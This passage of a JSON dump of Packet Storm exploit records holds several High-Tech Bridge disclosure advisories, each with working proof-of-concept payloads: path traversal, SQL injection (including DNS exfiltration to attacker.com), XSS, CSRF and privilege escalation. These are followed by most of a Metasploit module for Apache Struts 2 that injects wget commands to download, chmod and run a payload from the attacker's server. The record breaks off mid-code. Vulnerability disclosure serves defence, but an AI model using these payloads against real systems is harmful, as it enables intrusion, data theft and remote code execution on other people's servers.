\"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php\" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences. \n \nThe exploitation example below deletes a file \"/tmp/immuniweb\": \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb \n \nSuccessful exploitation of this vulnerability requires that file \"/tmp/immuniweb\" exists on the system. \n \n \n4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908 \n \n4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application. \n \nThe following URL can be used to gain knowledge of full installation path of the application: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/bp.php \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/videowhisper_streaming.php \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp.inc.php \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to VideoWhisper Live Streaming Integration version 4.29.5 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - Multiple Vulnerabilities in VideoWhisper Live Streaming Integration Plugin for WordPress. \n[2] VideoWhisper Live Streaming Integration - http://wordpress.org/plugins/videowhisper-live-streaming-integration/ - The VideoWhisper Live Streaming software can easily be used to add video broadcasting features to WordPress sites and live video streams on blog pages. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/125454/videowhisper-xssshelltraversal.txt"}, {"lastseen": "2016-12-05T22:15:33", "bulletinFamily": "exploit", "description": "", "modified": "2014-03-06T00:00:00", "published": "2014-03-06T00:00:00", "href": "https://packetstormsecurity.com/files/125571/OpenDocMan-1.2.7-SQL-Injection-Access-Control.html", "id": "PACKETSTORM:125571", "type": "packetstorm", "title": "OpenDocMan 1.2.7 SQL Injection / Access Control", "sourceData": "`Advisory ID: HTB23202 \nProduct: OpenDocMan \nVendor: Free Document Management Software \nVulnerable Version(s): 1.2.7 and probably prior \nTested Version: 1.2.7 \nAdvisory Publication: February 12, 2014 [without technical details] \nVendor Notification: February 12, 2014 \nVendor Patch: February 24, 2014 \nPublic Disclosure: March 5, 2014 \nVulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284] \nCVE References: CVE-2014-1945, CVE-2014-1946 \nRisk Level: High \nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application. \n \n \n1) SQL Injection in OpenDocMan: CVE-2014-1945 \n \nThe vulnerability exists due to insufficient validation of \"add_value\" HTTP GET parameter in \"/ajax_udf.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \n \nThe exploitation example below displays version of the MySQL server: \n \nhttp://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 \n \n \n2) Improper Access Control in OpenDocMan: CVE-2014-1946 \n \nThe vulnerability exists due to insufficient validation of allowed action in \"/signup.php\" script when updating user\u2019s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application. \n \nThe exploitation example below assigns administrative privileges for the current account: \n \n<form action=\"http://[host]/signup.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"updateuser\" value=\"1\"> \n<input type=\"hidden\" name=\"admin\" value=\"1\"> \n<input type=\"hidden\" name=\"id\" value=\"[USER_ID]\"> \n<input type=\"submit\" name=\"login\" value=\"Run\"> \n</form> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to OpenDocMan v1.2.7.2 \n \nMore Information: \nhttp://www.opendocman.com/opendocman-v1-2-7-1-release/ \nhttp://www.opendocman.com/opendocman-v1-2-7-2-released/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/HTB23202 - Multiple vulnerabilities in OpenDocMan. \n[2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Management System written in PHP. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125571/opendocman127-sql.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:16:55", "bulletinFamily": "exploit", "description": "", "modified": "2014-04-09T00:00:00", "published": "2014-04-09T00:00:00", "href": "https://packetstormsecurity.com/files/126074/Orbit-Open-Ad-Server-1.1.0-SQL-Injection.html", "id": "PACKETSTORM:126074", "type": "packetstorm", "title": "Orbit Open Ad Server 1.1.0 SQL Injection", "sourceData": "`Advisory ID: HTB23208 \nProduct: Orbit Open Ad Server \nVendor: OrbitScripts, LLC \nVulnerable Version(s): 1.1.0 and probably prior \nTested Version: 1.1.0 \nAdvisory Publication: March 19, 2014 [without technical details] \nVendor Notification: March 19, 2014 \nVendor Patch: March 21, 2014 \nPublic Disclosure: April 9, 2014 \nVulnerability Type: SQL Injection [CWE-89] \nCVE Reference: CVE-2014-2540 \nRisk Level: High \nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in Orbit Open Ad Server, which can be exploited to perform SQL Injection attacks, alter SQL requests to database of vulnerable application and potentially gain control over the vulnerable website. \n \n1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540 \n \nInput passed via the \"site_directory_sort_field\" HTTP POST parameter to \"/guest/site_directory\" URL is not properly sanitised before being used in SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL commands. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \n \n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\"> \n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\"> \n<input type=\"hidden\" name=\"category_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\"> \n<input type=\"hidden\" name=\"form_mode\" value=\"save\"> \n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\"> \n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\"> \n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\"> \n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \nThe second PoC code works against any platform (UNIX/Windows) and uses blind SQL injection brute-force (dichotomy) technique to extract data from the database: \n \n \n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\"> \n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\"> \n<input type=\"hidden\" name=\"category_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\"> \n<input type=\"hidden\" name=\"form_mode\" value=\"save\"> \n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\"> \n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\"> \n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\"> \n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Orbit Open Ad Server 1.1.1 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23208 - https://www.htbridge.com/advisory/HTB23208 - SQL Injection in Orbit Open Ad Server. \n[2] Orbit Open Ad Server - http://orbitopenadserver.com/ - the free, open source ad tool that lets you manage the profits while we manage the technology. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126074/orbitopenadserver-sql.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:15:19", "bulletinFamily": "exploit", "description": "", "modified": "2014-03-20T00:00:00", "published": "2014-03-20T00:00:00", "href": "https://packetstormsecurity.com/files/125797/CMSimple-3.54-Cross-Site-Scripting.html", "id": "PACKETSTORM:125797", "type": "packetstorm", "title": "CMSimple 3.54 Cross Site Scripting", "sourceData": "`Advisory ID: HTB23205 \nProduct: CMSimple \nVendor: Preben Bjorn Biermann Madsen \nVulnerable Version(s): 3.54 and probably prior \nTested Version: 3.54 \nAdvisory Publication: February 26, 2014 [without technical details] \nVendor Notification: February 26, 2014 \nVendor Patch: February 26, 2014 \nPublic Disclosure: March 19, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-2219 \nRisk Level: Medium \nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in CMSimple, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Reflected Cross-Site Scripting (XSS) in CMSimple: CVE-2014-2219 \n \nThe vulnerability exists due to insufficient sanitisation of user-supplied data in \"d\" HTTP GET parameter passed to \"/whizzywig/wb.php\" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the JavaScript \"alert()\" function to display \"immuniweb\" word: \n \nhttp://[host]/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nFixed by vendor on February 26, 2014 directly in the source code without version modification/new release. Update to the version 3.54 released after February 26, 2014. \n \nMore Information: \nhttp://sourceforge.net/projects/cmsimple-le/files/cmsimple_classic/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23205 - https://www.htbridge.com/advisory/HTB23205 - Cross-Site Scripting (XSS) in CMSimple. \n[2] CMSimple - http://cmsimple.p2pnation.eu/ - CMSimple is a content management system primarily designed for easy creation and maintenance of small commercial sites, or sites for associations and individuals. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125797/cmsimple354-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-12-05T22:23:18", "bulletinFamily": "exploit", "description": "", "modified": "2014-04-02T00:00:00", "published": "2014-04-02T00:00:00", "href": "https://packetstormsecurity.com/files/125991/WordPress-XCloner-3.1.0-Cross-Site-Request-Forgery.html", "id": "PACKETSTORM:125991", "type": "packetstorm", "title": "WordPress XCloner 3.1.0 Cross Site Request Forgery", "sourceData": "`Advisory ID: HTB23206 \nProduct: XCloner Wordpress plugin \nVendor: XCloner \nVulnerable Version(s): 3.1.0 and probably prior \nTested Version: 3.1.0 \nAdvisory Publication: March 12, 2014 [without technical details] \nVendor Notification: March 12, 2014 \nVendor Patch: March 13, 2014 \nPublic Disclosure: April 2, 2014 \nVulnerability Type: Cross-Site Request Forgery [CWE-352] \nCVE Reference: CVE-2014-2340 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of vulnerable website. \n \n \n\u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340 \n \nThe vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup. \n \nSimple exploit code below will create new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL: \n \n \n<form action=\"http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=confirm\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"dbbackup\" value=\"1\"> \n<input type=\"hidden\" name=\"dbbackup_comp\" value=\"\"> \n<input type=\"hidden\" name=\"bname\" value=\"backup\"> \n<input type=\"hidden\" name=\"backupComments\" value=\"\"> \n<input type=\"hidden\" name=\"option\" value=\"com_cloner\"> \n<input type=\"hidden\" name=\"task\" value=\"generate\"> \n<input type=\"hidden\" name=\"boxchecked\" value=\"0\"> \n<input type=\"hidden\" name=\"hidemainmenu\" value=\"0\"> \n<input type=\"hidden\" name=\"\" value=\"\"> \n<input type=\"submit\" name=\"run\" value=\"run\"> \n</form> \n<script> \ndocument.main.submit(); \n</script> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to XCloner 3.1.1 \n \nMore Information: \nhttp://www.xcloner.com/support/download/?did=9 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23206 - https://www.htbridge.com/advisory/HTB23206 - \u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin. \n[2] XCloner Wordpress plugin - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as standalone PHP/Mysql backup application. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125991/wpxcloner-xsrf.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:15:31", "bulletinFamily": "exploit", "description": "", "modified": "2014-03-12T00:00:00", "published": "2014-03-12T00:00:00", "href": "https://packetstormsecurity.com/files/125675/Open-Classifieds-2-2.1.2-Cross-Site-Scripting.html", "id": "PACKETSTORM:125675", "type": "packetstorm", "title": "Open Classifieds 2-2.1.2 Cross Site Scripting", "sourceData": "`Advisory ID: HTB23204 \nProduct: Open Classifieds \nVendor: Open Classifieds Team \nVulnerable Version(s): 2-2.1.2 and probably prior \nTested Version: 2-2.1.2 \nAdvisory Publication: February 19, 2014 [without technical details] \nVendor Notification: February 19, 2014 \nVendor Patch: February 20, 2014 \nPublic Disclosure: March 12, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-2024 \nRisk Level: Medium \nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in Open Classifieds, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Cross-Site Scripting (XSS) in Open Classifieds: CVE-2014-2024 \n \nThe vulnerability exists due to insufficient sanitisation of user-supplied data passed via the URI to \"/shared-apartments-rooms/\" URL. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the JavaScript \"alert()\" function to display \"immuniweb\" word: \n \nhttp://[host]/shared-apartments-rooms/</title><script>alert(%22immuniweb%22)</script> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Open Classifieds 2-2.1.3 \n \nMore Information: \nhttps://github.com/open-classifieds/openclassifieds2/issues/556 \nhttps://github.com/open-classifieds/openclassifieds2/commit/45ee8fb601a91b8a4238229580a32a4fd8d96ef9 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23204 - https://www.htbridge.com/advisory/HTB23204 - Cross-Site Scripting (XSS) in Open Classifieds. \n[2] Open Classifieds - http://open-classifieds.com - Open Classifieds is web software you can use to create a beautiful classifieds or listings. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/125675/openclassifieds2212-xss.txt"}, {"lastseen": "2016-12-05T22:13:37", "bulletinFamily": "exploit", "description": "", "modified": "2013-07-25T00:00:00", "published": "2013-07-25T00:00:00", "href": "https://packetstormsecurity.com/files/122541/Apache-Struts-2-DefaultActionMapper-Prefixes-OGNL-Code-Execution.html", "id": "PACKETSTORM:122541", "type": "packetstorm", "title": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution', \n'Description' => %q{ \nThe Struts 2 DefaultActionMapper supports a method for short-circuit navigation \nstate changes by prefixing parameters with \"action:\" or \"redirect:\", followed by \na desired navigational target expression. This mechanism was intended to help with \nattaching navigational information to buttons within forms. \n \nIn Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or \n\"redirectAction:\" is not properly sanitized. Since said information will be \nevaluated as OGNL expression against the value stack, this introduces the \npossibility to inject server side code. \n \nThis module has been tested successfully on Struts 2.3.15 over Tomcat 7, with \nWindows 2003 SP2 and Ubuntu 10.04 operating systems. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Takeshi Terada', # Vulnerability discovery \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit modules \n], \n'References' => \n[ \n[ 'CVE', '2013-2251' ], \n[ 'OSVDB', '95405' ], \n[ 'BID', '61189' ], \n[ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ] \n], \n'Platform' => [ 'win', 'linux'], \n'Targets' => \n[ \n['Automatic', {}], \n['Windows', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n] \n], \n'DefaultOptions' => \n{ \n'WfsDelay' => 10 \n}, \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'DisclosureDate' => 'Jul 2 2013', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']), \nOptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]), \n# It isn't OptPath becuase it's a *remote* path \nOptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only on Linux targets)\", \"/tmp\" ]) \n], self.class) \nend \n \ndef on_new_session(session) \nif session.type == \"meterpreter\" \nsession.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\") \nend \n \n@dropped_files.delete_if do |file| \nfalse unless file =~ /\\.exe/ \nwin_file = file.gsub(\"/\", \"\\\\\\\\\") \nif session.type == \"meterpreter\" \nbegin \nwintemp = session.fs.file.expand_path(\"%TEMP%\") \nwin_file = \"#{wintemp}\\\\#{win_file}\" \nsession.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|) \nsession.fs.file.rm(win_file) \nprint_good(\"Deleted #{file}\") \ntrue \nrescue ::Rex::Post::Meterpreter::RequestError \nprint_error(\"Failed to delete #{win_file}\") \nfalse \nend \nend \nend \n \nsuper \nend \n \ndef start_http_service \n#do not use SSL \nif datastore['SSL'] \nssl_restore = true \ndatastore['SSL'] = false \nend \n \nif (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\") \nsrv_host = Rex::Socket.source_address(rhost) \nelse \nsrv_host = datastore['SRVHOST'] \nend \n \nservice_url = srv_host + ':' + datastore['SRVPORT'].to_s \nprint_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\") \nstart_service({ \n'Uri' => { \n'Proc' => Proc.new { |cli, req| \non_request_uri(cli, req) \n}, \n'Path' => '/' \n} \n}) \n \ndatastore['SSL'] = true if ssl_restore \n \nreturn service_url \nend \n \ndef check \nuri = normalize_uri(target_uri.path) \nres = send_request_cgi({ \n'uri' => uri, \n'method' => 'GET' \n}) \n \nif res.nil? or res.code != 200 \nprint_error(\"#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI\") \nreturn Exploit::CheckCode::Unknown \nend \n \nproof = rand_text_alpha(6 + rand(4)) \n \nres = send_request_cgi({ \n'uri' => \"#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}\", \n'method' => 'GET' \n}) \n \nif res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Unknown \nend \n \ndef auto_target \nuri = normalize_uri(target_uri.path) \nres = send_request_cgi({ \n'uri' => uri, \n'method' => 'GET' \n}) \n \nif res.nil? or res.code != 200 \nfail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI, returning 200\") \nend \n \nproof = rand_text_alpha(6 + rand(4)) \n \nres = send_request_cgi({ \n'uri' => \"#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}\", \n'method' => 'GET' \n}) \n \nif res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ \nif res.headers['Location'] =~ /:\\\\/ \nreturn targets[1] # Windows \nelse \nreturn targets[2] # Linux \nend \nend \n \nfail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - Target auto-detection didn't work\") \n \nend \n \ndef exploit_linux \n \ndownfile = rand_text_alpha(8+rand(8)) \n@pl = @exe \n@pl_sent = false \n \n# \n# start HTTP service if necessary \n# \nservice_url = start_http_service \n \n# \n# download payload \n# \nfname = datastore['WritableDir'] \nfname = \"#{fname}/\" unless fname =~ %r'/$' \nfname << downfile \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Downloading payload to #{fname}...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \n# \n# wait for payload download \n# \nwait_payload \n \nregister_file_for_cleanup(fname) \n \n# \n# chmod \n# \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Make payload executable...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \n# \n# execute \n# \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f'))).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Execute payload...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 